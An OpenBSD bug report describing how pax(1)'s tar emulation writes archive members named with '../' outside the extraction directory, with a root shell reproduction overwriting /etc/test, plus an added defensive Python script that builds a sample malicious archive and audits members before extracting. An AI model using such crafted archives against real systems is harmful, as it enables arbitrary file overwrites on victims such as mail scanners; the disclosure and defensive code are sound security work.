
user/2177: tar emulation from pax(1) vulnerable to relative paths problem

>Number:         2177
>Category:       user
>Synopsis:       tar emulation from pax(1) vulnerable to relative paths problem
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    bugs
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Wed Nov 14 06:00:02 MST 2001
>Last-Modified:
>Originator:     Przemysław Frasunek
>Organization:
net
>Release:        any
>Environment:
	System      : OpenBSD 2.9
	Architecture: OpenBSD.i386
	Machine     : i386
>Description:

pax(1), and therefore the tar(1) emulation built on it, allows arbitrary files
on the system to be overwritten when a malicious archive containing relative
path components ("../") is unpacked: the stored member name is used as-is, so
a member such as ../../../../../../etc/test is written outside the directory
the archive is being extracted into.

This exposes a security risk in mail anti-virus scanners, which unpack
untrusted archives automatically.

>How-To-Repeat:

riget:root:/tmp# touch /etc/test
riget:root:/tmp# tar -cf test.tar ../../../../../../etc/test
riget:root:/tmp# rm /etc/test
riget:root:/tmp# tar -xf test.tar
riget:root:/tmp# ls -la /etc/test
-rw-r--r--  1 root  wheel  0 12 Nov 13:43 /etc/test

>Fix:

Unknown.
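The check an extractor needs, as an added example that is not part of the report and not code from OpenBSD's pax(1): a Python script that constructs an in-memory tar containing the same ../../../../../../etc/test member (plus an absolute name, a name that only escapes after normalization, and a symlink whose target escapes), audits every member before anything is written, and extracts only a clean archive. The archive contents and all function names are constructed for this example.

```python
"""Audit tar members for path traversal before anything is written.

Added example for this report; not code from OpenBSD's pax(1) or from the
submitter. The archive built below is constructed to mirror the member name
in the How-To-Repeat, and every function name here is this example's own.
"""
import io
import os
import posixpath
import tarfile
import tempfile
from typing import Dict, List, Optional


def build_sample_archive(include_malicious: bool = True) -> bytes:
    """Build an in-memory tar; names and contents are constructed for this example."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:

        def add(name: str, data: bytes = b"", **fields) -> None:
            # TarInfo is filled by hand so names are stored exactly as given,
            # without the "/" or "../" stripping a tar CLI might apply.
            info = tarfile.TarInfo(name)
            info.size = len(data)
            for key, value in fields.items():
                setattr(info, key, value)
            tf.addfile(info, io.BytesIO(data) if data else None)

        add("etc/test", b"benign\n")                        # stays under the root
        if include_malicious:
            add("../../../../../../etc/test", b"owned\n")   # the report's pattern
            add("/etc/test", b"absolute\n")                  # absolute member name
            add("sub/../../escape", b"escapes once normalized\n")
            add("link", type=tarfile.SYMTYPE, linkname="../../outside")
    return buf.getvalue()


def stays_inside(rel_path: str) -> bool:
    """Lexical check: absolute names are rejected; otherwise the path is
    normalized (so "sub/../../x" becomes "../x") and rejected if it leads with "..".
    """
    if posixpath.isabs(rel_path):
        return False
    norm = posixpath.normpath(rel_path)
    return norm != ".." and not norm.startswith("../")


def member_problem(member: tarfile.TarInfo) -> Optional[str]:
    """Return why `member` must not be extracted, or None if it is safe."""
    if not stays_inside(member.name):
        return "name resolves outside the extraction root"
    if member.issym():
        # A symlink target is resolved relative to the link's own directory.
        target = posixpath.join(posixpath.dirname(member.name), member.linkname)
        if not stays_inside(target):
            return "symlink target resolves outside the extraction root"
    if member.islnk() and not stays_inside(member.linkname):
        # Hard-link targets are archive-relative, like member names.
        return "hard link target resolves outside the extraction root"
    if member.isdev():
        return "device node"
    return None


def audit_archive(data: bytes) -> Dict[str, str]:
    """Map every unsafe member name to the reason it was rejected."""
    problems: Dict[str, str] = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tf:
        for member in tf.getmembers():
            reason = member_problem(member)
            if reason is not None:
                problems[member.name] = reason
    return problems


def safe_extract(data: bytes, dest: str) -> List[str]:
    """Audit the whole archive first; extract only if no member is unsafe.

    Nothing is written to `dest` when the audit fails, unlike the behaviour in
    the report, where each member is written as soon as it is read.
    """
    problems = audit_archive(data)
    if problems:
        raise ValueError("refusing to extract: %r" % problems)
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tf:
        members = tf.getmembers()
        # Newer tarfile releases ship a 'data' filter with similar rules;
        # use it as a second layer where present.
        extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tf.extractall(dest, members=members, **extra)
        return [m.name for m in members]


def demo() -> Dict[str, object]:
    """Audit the malicious archive, then extract the benign one into a temp dir."""
    rejected = audit_archive(build_sample_archive())
    try:
        safe_extract(build_sample_archive(), "out")   # must refuse before writing
        refused = False
    except ValueError:
        refused = True
    with tempfile.TemporaryDirectory() as dest:
        extracted = safe_extract(build_sample_archive(include_malicious=False), dest)
        with open(os.path.join(dest, "etc", "test"), "rb") as fh:
            content = fh.read()
    return {"rejected": rejected, "refused": refused,
            "extracted": extracted, "content": content}
```

The property that matters is ordering: every member is checked before the first write. pax(1) in the report fails because it trusts the stored name; a streaming extractor can apply the same stays_inside test per member as it reads, provided it refuses before creating the entry. The check is lexical, so it also assumes nothing under the destination is already a symlink pointing outside it; extracting into a fresh, empty directory removes that assumption.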

>Audit-Trail:
>Unformatted: